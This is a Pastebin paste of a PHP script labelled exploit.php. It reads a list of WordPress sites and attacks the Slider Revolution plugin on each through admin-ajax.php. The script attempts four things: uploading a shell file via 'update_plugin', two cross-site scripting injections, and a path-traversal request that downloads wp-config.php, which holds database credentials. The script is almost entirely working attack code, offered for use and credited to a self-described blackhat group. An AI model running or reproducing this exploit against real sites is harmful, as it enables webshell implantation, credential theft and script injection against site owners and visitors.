daily pastebin goal
5%
SHARE
TWEET

Untitled

a guest Oct 12th, 2017 330 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /** me@dwisiswanto.my.id **/
  3.  
  4. /******************************************
  5.  First, install PHP CLI
  6.  USAGE: php exploit.php list-of-target.txt
  7. ******************************************/
  8.  
  9. $cafc = array(
  10.     "file"=>"revslider.zip", // enter a ur shell file into a zip
  11.     "xss"=>"<marquee>CaFc Versace was Here", // for xss
  12.     "kfg"=>"..\wp-config.php" // for download config
  13. );
  14.  
  15. function hajar($yuerel, $dataAing=null) {
  16.     $cuih = curl_init();
  17.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  18.     if ($dataAing != null){
  19.         curl_setopt($cuih, CURLOPT_POST, true);
  20.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  21.     }
  22.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  23.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  24.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  25.     $eks = curl_exec($cuih);
  26.     curl_close($cuih);
  27.     return $eks;
  28. }
  29.  
  30. $site = @file_get_contents($argv[1]);
  31. $tumbal = explode("\r\n", $site);
  32. echo "Calculate the target list : " . count($tumbal);
  33. if (!isset($site)) {
  34.     echo "Site N/A.";
  35. } else {
  36.     foreach ($tumbal as $uri) {
  37.         echo "\n------------------------------------";
  38.         echo "\nTarget => " . $uri;
  39.         echo "\n";
  40.         $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
  41.             "action" => "revslider_ajax_action",
  42.             "client_action" => "update_plugin",
  43.             "update_file" => $cafc['file'])
  44.         );
  45.         $jason = json_decode($menta, true);
  46.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  47.             echo "\nExploit [update_plugin] => NOT VULNERABLE";
  48.         } else {
  49.             echo "\nExploit [update_plugin] => SUCCESS";
  50.             echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
  51.         }
  52.  
  53.         $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  54.             "action" => "revslider_ajax_action",
  55.             "client_action" => "get_captions_css",
  56.             "data" => $cafc['xss'])
  57.         );
  58.         $jasonB = json_decode($menta2, true);
  59.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  60.             echo "\nExploit [get_captions_css] => NOT VULNERABLE";
  61.         } elseif ($jasonB['success'] == true) {
  62.             echo "\nExploit [get_captions_css] => SUCCESS";
  63.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  64.             echo "action=revslider_ajax_action&";
  65.             echo "client_action=get_captions_css";
  66.             echo "data=" . urlencode($cafc['xss']) . "\n";
  67.         }
  68.  
  69.         $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  70.             "action" => "revslider_ajax_action",
  71.             "client_action" => $cafc['xss'])
  72.         );
  73.         $jasonC = json_decode($menta3, true);
  74.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  75.             echo "\nExploit [xss] => SUCCESS";
  76.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  77.             echo "action=revslider_ajax_action";
  78.             echo "client_action=" . urlencode($cafc['xss']) . "\n";
  79.         } else {
  80.             echo "\nExploit [xss] => NOT VULNERABLE";
  81.         }
  82.  
  83.         $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  84.             "action" => "revslider_show_image",
  85.             "img" => $cafc['kfg']),
  86.         $uri);
  87.         if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
  88.             echo "\nExploit [wp-config] => NOT VULNERABLE\n";
  89.         } else {
  90.             echo "\nExploit [wp-config] => SUCCESS";
  91.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  92.             echo "action=revslider_show_image";
  93.             echo "img=" . $cafc['kfg'] . "\n";
  94.         }
  95.     }
  96. }
  97. ?>
  98. -------------------------------------------------------------------------------------
  99.  
  100.  
  101. # Credits :
  102. -------------------------------------------------------------------------------------
  103. CaFc Versace
  104. Thanks : Agency CaFc - Surabaya BlackHat
  105. -------------------------------------------------------------------------------------
  106.  
  107.  
  108. ./learn to be better
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top